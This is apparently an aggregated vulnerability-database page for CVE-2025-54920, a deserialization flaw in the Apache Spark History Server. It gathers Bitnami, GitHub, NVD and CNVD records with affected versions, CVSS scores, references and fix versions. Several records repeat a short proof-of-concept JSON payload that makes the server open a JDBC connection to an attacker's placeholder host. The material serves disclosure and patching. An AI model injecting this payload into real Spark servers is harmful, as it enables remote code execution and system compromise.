Start the Spark History Server with logs pointing to the modified directory.
The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection.

Impact

An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Bitnami",
        "name": "spark",
        "purl": "pkg:bitnami/spark"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.5.7"
            },
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.0.1"
            }
          ],
          "type": "SEMVER"
        }
      ],
      "severity": [
        {
          "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "type": "CVSS_V3"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-54920"
  ],
  "database_specific": {
    "cpes": [
      "cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:*",
      "cpe:2.3:a:apache:spark:*:*:*:*:*:maven:*:*"
    ],
    "severity": "High"
  },
  "details": "This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.\n\n\n\n\n\nSummary\n\nApache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.\n\n\n\n\n\nDetails\n\nThe vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.\n\n\nThe attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.\n\n\n\n\n\n\nProof of Concept:\n\n1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).\n\n2. Inject the following JSON at the beginning of an event log file:\n\n\n{\n\n  \"Event\": \"org.apache.hive.jdbc.HiveConnection\",\n  \"uri\": \"jdbc:hive2://\u003cIP\u003e:\u003cPORT\u003e/\",\n  \"info\": {\n    \"hive.metastore.uris\": \"thrift://\u003cIP\u003e:\u003cPORT\u003e\"\n  }\n}\n\n\n\n\n\n\n\n3. Start the Spark History Server with logs pointing to the modified directory.\n\n4. The Spark History Server initiates a JDBC connection to the attacker\u2019s server, confirming the injection.\n\n\n\n\n\n\n\n\n\n\nImpact\n\nAn attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.",
  "id": "BIT-spark-2025-54920",
  "modified": "2026-03-20T09:47:33.381Z",
  "published": "2026-03-18T08:54:07.780Z",
  "references": [
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2026/03/13/4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/spark/pull/51312"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/spark/pull/51323"
    },
    {
      "type": "WEB",
      "url": "https://issues.apache.org/jira/browse/SPARK-52381"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54920"
    }
  ],
  "schema_version": "1.6.2",
  "summary": "Apache Spark: Spark History Server Code Execution Vulnerability"
}

GHSA-JWP6-CVJ8-FW65

Vulnerability from github – Published: 2026-03-16 15:30 – Updated: 2026-03-17 19:53

Summary

Apache Spark: Spark History Server Code Execution Vulnerability

Details

This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.

Summary

Details

Proof of Concept:

Run Spark with event logging enabled, writing to a writable directory (spark-logs).
Inject the following JSON at the beginning of an event log file:

{

  "Event": "org.apache.hive.jdbc.HiveConnection",
  "uri": "jdbc:hive2://<IP>:<PORT>/",
  "info": {
    "hive.metastore.uris": "thrift://<IP>:<PORT>"
  }
}

Start the Spark History Server with logs pointing to the modified directory.
The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection.

Impact

An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.

Severity ?

8.8 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.spark:spark-core_2.13"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.0.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.spark:spark-core_2.13"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.5.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.spark:spark-core_2.12"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.5.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.spark:spark-core_2.11"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.4.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.spark:spark-core_2.10"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.apache.spark:spark-core_2.9.3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.8.1-incubating"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-54920"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-17T19:53:20Z",
    "nvd_published_at": "2026-03-16T14:17:59Z",
    "severity": "HIGH"
  },
  "details": "This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.\n\n## Summary\n\nApache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.\n\n## Details\n\nThe vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.\n\nThe attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.\n\n## Proof of Concept:\n\n1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).\n\n2. Inject the following JSON at the beginning of an event log file:\n\n```\n{\n\n  \"Event\": \"org.apache.hive.jdbc.HiveConnection\",\n  \"uri\": \"jdbc:hive2://\u003cIP\u003e:\u003cPORT\u003e/\",\n  \"info\": {\n    \"hive.metastore.uris\": \"thrift://\u003cIP\u003e:\u003cPORT\u003e\"\n  }\n}\n```\n3. Start the Spark History Server with logs pointing to the modified directory.\n\n4. The Spark History Server initiates a JDBC connection to the attacker\u2019s server, confirming the injection.\n\n## Impact\n\nAn attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.",
  "id": "GHSA-jwp6-cvj8-fw65",
  "modified": "2026-03-17T19:53:20Z",
  "published": "2026-03-16T15:30:41Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54920"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/spark/pull/51312"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apache/spark/pull/51323"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apache/spark"
    },
    {
      "type": "WEB",
      "url": "https://issues.apache.org/jira/browse/SPARK-52381"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2026/03/13/4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Apache Spark: Spark History Server Code Execution Vulnerability"
}

FKIE_CVE-2025-54920

Vulnerability from fkie_nvd - Published: 2026-03-16 14:17 - Updated: 2026-03-20 19:16

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security@apache.org	https://github.com/apache/spark/pull/51312	Issue Tracking
security@apache.org	https://github.com/apache/spark/pull/51323	Issue Tracking
security@apache.org	https://issues.apache.org/jira/browse/SPARK-52381	Issue Tracking
security@apache.org	https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s	Mitigation, Vendor Advisory, Exploit
af854a3a-2127-422b-91ae-364da2661108	http://www.openwall.com/lists/oss-security/2026/03/13/4	Mailing List, Third Party Advisory, Exploit

Impacted products

Vendor	Product	Version
apache	spark	*
apache	spark	4.0.0
apache	spark	4.0.0
apache	spark	4.0.0
apache	spark	4.0.0
apache	spark	4.0.0
apache	spark	4.0.0
apache	spark	4.0.0
apache	spark	4.0.0
apache	spark	4.0.1

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9D7D7694-BC03-478D-9F4B-143441071D93",
              "versionEndExcluding": "3.5.7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:apache:spark:4.0.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "DDCC2B9D-079B-4E07-9043-B11203EC9F2D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:apache:spark:4.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "EFBBB699-7556-4930-B57C-77B61EF11F54",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:apache:spark:4.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "19E77AEE-7D2B-4A88-BB46-B214EBF0FD92",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:apache:spark:4.0.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "85BD7BB3-7A01-4A4F-BED5-FFC89071192A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:apache:spark:4.0.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "50984263-15BA-4538-B7B7-D13C18FFD4D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:apache:spark:4.0.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "EF184C3A-6625-42DF-BAF8-052614E1670B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:apache:spark:4.0.0:rc6:*:*:*:*:*:*",
              "matchCriteriaId": "8631C8B2-821B-4E44-97EC-DD670C9FC730",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:apache:spark:4.0.0:rc7:*:*:*:*:*:*",
              "matchCriteriaId": "37BF5C2F-9A7B-4084-9F7F-11DB4199631C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:apache:spark:4.0.1:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "8A685F3A-5A0F-4AC9-A07B-1C596B8B4596",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.\n\n\n\n\n\nSummary\n\nApache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.\n\n\n\n\n\nDetails\n\nThe vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.\n\n\nThe attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.\n\n\n\n\n\n\nProof of Concept:\n\n1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).\n\n2. Inject the following JSON at the beginning of an event log file:\n\n\n{\n\n  \"Event\": \"org.apache.hive.jdbc.HiveConnection\",\n  \"uri\": \"jdbc:hive2://\u003cIP\u003e:\u003cPORT\u003e/\",\n  \"info\": {\n    \"hive.metastore.uris\": \"thrift://\u003cIP\u003e:\u003cPORT\u003e\"\n  }\n}\n\n\n\n\n\n\n\n3. Start the Spark History Server with logs pointing to the modified directory.\n\n4. The Spark History Server initiates a JDBC connection to the attacker\u2019s server, confirming the injection.\n\n\n\n\n\n\n\n\n\n\nImpact\n\nAn attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system."
    },
    {
      "lang": "es",
      "value": "Este problema afecta a Apache Spark: antes de 3.5.7 y 4.0.1. Se recomienda a los usuarios actualizar a la versi\u00f3n 3.5.7 o 4.0.1 y posteriores, que corrige el problema.\n\nResumen\n\nApache Spark 3.5.4 y versiones anteriores contienen una vulnerabilidad de ejecuci\u00f3n de c\u00f3digo en la interfaz de usuario web de Spark History debido a una deserializaci\u00f3n de Jackson excesivamente permisiva de los datos del registro de eventos. Esto permite a un atacante con acceso al directorio de registros de eventos de Spark inyectar cargas \u00fatiles JSON maliciosas que desencadenan la deserializaci\u00f3n de clases arbitrarias, lo que permite la ejecuci\u00f3n de comandos en el host que ejecuta el Spark History Server.\n\nDetalles\n\nLa vulnerabilidad surge porque el Spark History Server utiliza la deserializaci\u00f3n polim\u00f3rfica de Jackson con @JsonTypeInfo.Id.CLASS en objetos SparkListenerEvent, lo que permite a un atacante especificar nombres de clase arbitrarios en el JSON del evento. Este comportamiento permite instanciar clases no deseadas, como org.apache.hive.jdbc.HiveConnection, que pueden realizar llamadas de red u otras acciones maliciosas durante la deserializaci\u00f3n.\n\nEl atacante puede explotar esto inyectando contenido JSON manipulado en los archivos de registro de eventos de Spark, que el History Server luego deserializa al iniciar o al cargar los registros de eventos. Por ejemplo, el atacante puede forzar al History Server a abrir una conexi\u00f3n JDBC a un servidor remoto controlado por el atacante, demostrando la capacidad de inyecci\u00f3n de comandos remota.\n\nPrueba de concepto:\n\n1. Ejecute Spark con el registro de eventos habilitado, escribiendo en un directorio con permisos de escritura (spark-logs).\n\n2. Inyecte el siguiente JSON al principio de un archivo de registro de eventos:\n\n{\n\n  \"Event\": \"org.apache.hive.jdbc.HiveConnection\",\n  \"uri\": \"jdbc:hive2://:/\",\n  \"info\": {\n    \"hive.metastore.uris\": \"thrift://:\"\n  }\n}\n\n3. Inicie el Spark History Server con los registros apuntando al directorio modificado.\n\n4. El Spark History Server inicia una conexi\u00f3n JDBC al servidor del atacante, confirmando la inyecci\u00f3n.\n\nImpacto\n\nUn atacante con acceso de escritura a los registros de eventos de Spark puede ejecutar c\u00f3digo arbitrario en el servidor que ejecuta el History Server, comprometiendo potencialmente todo el sistema."
    }
  ],
  "id": "CVE-2025-54920",
  "lastModified": "2026-03-20T19:16:45.837",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-16T14:17:59.877",
  "references": [
    {
      "source": "security@apache.org",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/apache/spark/pull/51312"
    },
    {
      "source": "security@apache.org",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://github.com/apache/spark/pull/51323"
    },
    {
      "source": "security@apache.org",
      "tags": [
        "Issue Tracking"
      ],
      "url": "https://issues.apache.org/jira/browse/SPARK-52381"
    },
    {
      "source": "security@apache.org",
      "tags": [
        "Mitigation",
        "Vendor Advisory",
        "Exploit"
      ],
      "url": "https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory",
        "Exploit"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2026/03/13/4"
    }
  ],
  "sourceIdentifier": "security@apache.org",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-502"
        }
      ],
      "source": "security@apache.org",
      "type": "Secondary"
    }
  ]
}

CNVD-2026-14252

Vulnerability from cnvd - Published: 2026-03-19

Title

Apache Spark反序列化漏洞

Description

Apache Spark是美国阿帕奇（Apache）基金会的一款支持非循环数据流和内存计算的大规模数据处理引擎。 Apache Spark存在反序列化漏洞。该漏洞源于Spark History Web UI对事件日志数据的Jackson反序列化过于宽松，攻击者可利用该漏洞通过注入恶意JSON有效载荷在主机上执行任意代码。

Severity

高

Patch Name

Apache Spark反序列化漏洞的补丁

Patch Description

Formal description

厂商已发布了漏洞修复程序，请及时关注更新： https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s

Reference

https://github.com/apache/spark/pull/51312

Impacted products

Name
['Apache Spark <3.5.7', 'Apache Spark <4.0.1']

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2025-54920",
      "cveUrl": "https://nvd.nist.gov/vuln/detail/CVE-2025-54920"
    }
  },
  "description": "Apache Spark\u662f\u7f8e\u56fd\u963f\u5e15\u5947\uff08Apache\uff09\u57fa\u91d1\u4f1a\u7684\u4e00\u6b3e\u652f\u6301\u975e\u5faa\u73af\u6570\u636e\u6d41\u548c\u5185\u5b58\u8ba1\u7b97\u7684\u5927\u89c4\u6a21\u6570\u636e\u5904\u7406\u5f15\u64ce\u3002\n\nApache Spark\u5b58\u5728\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u3002\u8be5\u6f0f\u6d1e\u6e90\u4e8eSpark History Web UI\u5bf9\u4e8b\u4ef6\u65e5\u5fd7\u6570\u636e\u7684Jackson\u53cd\u5e8f\u5217\u5316\u8fc7\u4e8e\u5bbd\u677e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u901a\u8fc7\u6ce8\u5165\u6076\u610fJSON\u6709\u6548\u8f7d\u8377\u5728\u4e3b\u673a\u4e0a\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002",
  "formalWay": "\u5382\u5546\u5df2\u53d1\u5e03\u4e86\u6f0f\u6d1e\u4fee\u590d\u7a0b\u5e8f\uff0c\u8bf7\u53ca\u65f6\u5173\u6ce8\u66f4\u65b0\uff1a\r\nhttps://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2026-14252",
  "openTime": "2026-03-19",
  "patchDescription": "Apache Spark\u662f\u7f8e\u56fd\u963f\u5e15\u5947\uff08Apache\uff09\u57fa\u91d1\u4f1a\u7684\u4e00\u6b3e\u652f\u6301\u975e\u5faa\u73af\u6570\u636e\u6d41\u548c\u5185\u5b58\u8ba1\u7b97\u7684\u5927\u89c4\u6a21\u6570\u636e\u5904\u7406\u5f15\u64ce\u3002\r\n\r\nApache Spark\u5b58\u5728\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u3002\u8be5\u6f0f\u6d1e\u6e90\u4e8eSpark History Web UI\u5bf9\u4e8b\u4ef6\u65e5\u5fd7\u6570\u636e\u7684Jackson\u53cd\u5e8f\u5217\u5316\u8fc7\u4e8e\u5bbd\u677e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u901a\u8fc7\u6ce8\u5165\u6076\u610fJSON\u6709\u6548\u8f7d\u8377\u5728\u4e3b\u673a\u4e0a\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "Apache Spark\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": [
      "Apache Spark \u003c3.5.7",
      "Apache Spark \u003c4.0.1"
    ]
  },
  "referenceLink": "https://github.com/apache/spark/pull/51312",
  "serverity": "\u9ad8",
  "submitTime": "2026-03-19",
  "title": "Apache Spark\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-54920 (GCVE-0-2025-54920)

bit-spark-2025-54920

Vulnerability from bitnami_vulndb

GHSA-JWP6-CVJ8-FW65

Summary

Details

Proof of Concept:

Impact

FKIE_CVE-2025-54920

CNVD-2026-14252

Tags

Sightings

Nomenclature